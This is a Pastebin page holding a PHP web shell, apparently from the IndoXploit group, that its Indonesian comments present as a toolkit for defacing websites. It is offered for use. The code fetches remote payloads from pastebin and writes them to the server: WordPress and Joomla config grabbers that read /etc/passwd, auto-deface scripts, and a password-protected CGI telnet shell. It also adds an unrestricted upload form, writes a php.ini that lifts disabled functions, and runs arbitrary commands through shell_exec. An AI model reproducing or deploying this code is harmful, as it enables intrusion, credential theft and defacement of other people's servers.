Advertisement
Tu5b0l3d

gabungan tools

Jan 1st, 2016
3,531
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 6.48 KB | None | 0 0
  1. <?php
  2. // Tu5b0l3d - IndoXploit
  3. // thx for you.
  4. // http://indoxploit.blogspot.co.id/2016/01/simple-tools-for-deface.html
  5.  
  6. function parah($pastebin, $nama_file){
  7.     $usa = file_get_contents("$pastebin");
  8.     $frr = fopen("$nama_file", 'w');
  9.     fwrite($frr, $usa);
  10. }
  11. $xp = $_GET[xp];
  12. $b = "Ini merupakan beberapa tool untuk mempermudah dalam hal mendeface ataupun yang lainnya.<br><br>#<br>Tu5b0l3d - IndoXploit";
  13. if($xp == "config_grabber_wp_jm"){
  14.     $config = parah("http://pastebin.com/raw.php?i=deH5eAqP", "config_wp_jm_grabber.php");
  15.        
  16.         $b = '<h2><a href="config_wp_jm_grabber.php" target="_blank">Config Grabber Wordpress dan joomla</a></h2><br>
  17.         tool ini pertama ambil user dari /etc/passwd, kemudian cek apakah user Readable atau tidak, jika readable Maka akan diambil confignya';
  18.        
  19. }
  20. elseif($xp == "just_jumping"){
  21.     $jump = parah("http://pastebin.com/raw.php?i=eewrEsJY", "just_jumping.php");
  22.        
  23.         $b = '<h2><a href="just_jumping.php" target="_blank">Just Jumping</a></h2><br>
  24.         tool jumping ini cuma melihat apakah user readable atau tidak menggunakan fungsi is_readable, jika readable, maka ditampilkan, <br>dan juga nama domainnya akan ditampilkan untuk mempermudah memakai tools yang lainnya.';
  25.  
  26.     }
  27.     elseif($xp == "pepes_joomla"){
  28.     $pepes_joomla = parah("http://pastebin.com/raw.php?i=50NQdet2", "pepes_joomla.php");
  29.        
  30.         $b = '<h2><a href="pepes_joomla.php" target="_blank">Auto Deface site cms Joomla</a></h2><br>
  31.         tool ini bisa untuk auto deface jika ente tau nama sitenya, sebelumnya ambil confignya dulu <a href="?xp=config_grabber_wp_jm" target="_blank">disini</a><br>
  32.         video: <a href="https://youtu.be/clvLy5pDA2I" target="_blank">tonton</a>';
  33.  
  34.     }
  35.     elseif($xp == "pepes_wp"){
  36.         $pepes_wp = parah("http://pastebin.com/raw.php?i=uQWCGPMS", "pepes_wp.php");
  37.  
  38.         $b = '<h2><a href="pepes_wp.php" target="_blank">Auto Deface site cms Wordpress</a></h2><br>
  39.         tool ini bisa untuk auto deface site berCMS Wordpress, sebelumnya ambil confignya dulu <a href="?xp=config_grabber_wp_jm" target="_blank">disini</a><br>
  40.         video: <a href="https://youtu.be/tWEcMuiqKlo" target="_blank">tonton</a>';
  41.  
  42.     }
  43.     elseif($xp == "pepes_wp2"){
  44.     $pepes_wp2 = parah("http://pastebin.com/raw.php?i=4rZfJaqE", "pepes_wp2.php");
  45.    
  46.         $b = '<h2><a href="pepes_wp2.php" target="_blank">Auto Deface site cms Wordpress 2</a></h2><br>
  47.         Tool ini ialah untuk auto Deface site berCMS Wordpress hanya dengan memasukan link config, sebelumnya ambil confignya dulu <a href="?xp=config_grabber_wp_jm" target="_blank">disini</a><br><br>*nb: ingat, masukan Link confignya<br>';
  48.  
  49.     }
  50.  
  51.     elseif($xp == "link_title"){
  52.     $link_title = parah("http://pastebin.com/raw.php?i=u69dMjH9", "link_title.php");
  53.    
  54.         $b = '<h2><a href="link_title.php" target="_blank">Auto Deface site cms Wordpress 2</a></h2><br>
  55.         Tool ini ialah untuk auto Deface site berCMS Wordpress hanya dengan memasukan link config, sebelumnya ambil confignya dulu <a href="?xp=config_grabber_wp_jm" target="_blank">disini</a><br><br>*nb: ingat, masukan Link confignya<br>';
  56.  
  57.     }
  58.  
  59.     elseif($xp == "cgi"){
  60.     $dir = mkdir('cgi', 0777);
  61.     $cgi = parah("http://pastebin.com/raw.php?i=XTUFfJLg", "cgi/anu.izo");
  62.    
  63.                 $acces = "AddHandler cgi-script .izo";
  64.                 $frr2 = fopen('cgi/.htaccess', 'w');
  65.                 fwrite($frr2, $acces);
  66.                 chmod("cgi/anu.izo", 0755);
  67.  
  68.        
  69.         $b = '<h2><a href="cgi/anu.izo" target="_blank">CGI Telnet</a></h2><br>
  70.         password = indoXploit<br>it\' powerfull, source: <a href="http://www.rohitab.com/cgi-telnet" target="_blank">Rohitab.com</a>';
  71.  
  72.     }
  73.     elseif($xp == "upload"){
  74.     if($_POST['v']){
  75. if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
  76. $b = "<b>berhasil</b>-->".$_FILES["f"]["name"];
  77. }else{
  78. $b = "<b>gagal</b>";
  79. }
  80. }
  81. else{
  82.     $b = "<form method=post enctype=multipart/form-data><input type=file name=f><input name=v type=submit id=v value=up><br>";
  83. }
  84.  
  85.  
  86.     }
  87.     elseif($xp == "bypass"){
  88.     $dir = getcwd();
  89.     $isi = 'safe_mode = off
  90. disable_functions = NONE
  91. ';
  92. $buka = fopen($dir.'/php.ini', 'w');
  93. fwrite($buka, $isi);
  94.        
  95.         $b = '<h2><a href="php.ini" target="_blank">Bypass Disabled Functions</a></h2><br>
  96.         klik link tsb.';
  97.  
  98.     }
  99.  
  100.    
  101.  
  102.     elseif($xp == "command"){
  103. session_start();
  104. if(empty($_SESSION["dir"]))$_SESSION["dir"]="./";
  105.  
  106. $a = '<textarea rows="10" cols="100">';
  107. if(isset($_POST['command'])){
  108. isset($_SESSION["dir"])?chdir($_SESSION["dir"]):null;
  109. $cmd=trim($_POST['command']);
  110. if(preg_match("/^cd\s/i",$cmd)){
  111. $pecah=explode(" ",preg_replace("/\s+/"," ",$cmd));
  112. if(@chdir($pecah[1])){
  113. $n="directory changed to $pecah[1]";
  114. $_SESSION["dir"].=$pecah[1]."/";
  115. }
  116. else $n="error cd";
  117. }else $n=shell_exec($_POST['command']);
  118. }else $n='';
  119. $c = "</textarea>";
  120. $b = $a.$n.$c;
  121.     }
  122.     echo '<!DOCTYPE html>
  123. <html>
  124. <head>
  125.     <title>IndoXploit</title>
  126.  
  127.     <style>
  128.         a{
  129.             text-decoration: none;
  130.         }
  131.         a:hover{
  132.             color: red;
  133.         }
  134.         .kotak{
  135.             border: 1px solid grey;
  136.             width: 200px;
  137.             height: 20px;
  138.             text-align: center;
  139.             border-radius: 3px;
  140.             float: left;
  141.             margin-right: 5px;
  142.         }
  143.         .kotak:hover{
  144.             border: 1px solid red;
  145.  
  146.         }
  147.         #com{
  148.             margin-right: 70px;
  149.             float: left;
  150.         }
  151.  
  152.     </style>
  153. </head>
  154. <body>
  155.     <center><h2>Simple Tools by Indo<font color="red">}{</font>ploit</h2></center><hr>
  156.     <div class="kotak"><a href="?xp=just_jumping">Just Jumping</a></div>
  157.     <div class="kotak"><a href="?xp=config_grabber_wp_jm">Config Grabber WP dan Joomla</a></div>
  158.     <div class="kotak"><a href="?xp=pepes_joomla">Auto Deface site cms joomla</a></div>
  159.     <div class="kotak"><a href="?xp=pepes_wp">Auto Deface site Wordpress</a></div>
  160.     <div class="kotak"><a href="?xp=pepes_wp2">Auto Deface site Wordpress 2</a></div>
  161.     <div class="kotak"><a href="?xp=link_title">Title site Wordpress</a></div>
  162.    
  163.     ';
  164.  
  165.     echo "<br><br><br>$b<br><br><br><br><hr>
  166. </body>
  167. </html>";
  168. if(@ini_get("disable_functions")){
  169.  echo "Disabled Functions = <font color='red'>".@ini_get("disable_functions")."</font>";
  170. }else{
  171.  echo "Disable Functions = None";
  172. }
  173.  
  174.  if(@ini_get("safe_mode")){echo "<br><br>Safe Mode = <font color='red'>ON<br><br>";}else{ echo "<br><br>Safe Mode = OFF<br><br>";}
  175.  $kernel = shell_exec("uname -a");
  176.  echo "Kernel: <font color='red'>$kernel<br><br>";
  177.  echo '<div class="kotak"><a href="?xp=bypass">Bypass disabled Functions</a></div> <div class="kotak"><a href="?xp=cgi">CGI Telnet</a></div><div class="kotak"><a href="?xp=upload">Upload File</a></div><br><br>';
  178.  echo '<div id="com"><form method="post" action="?xp=command"><input type="text" name="command" placeholder="Command"><input type="submit" value="Go!"></div>';
  179.  
  180.  
  181.  
  182.  
  183.  
  184. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement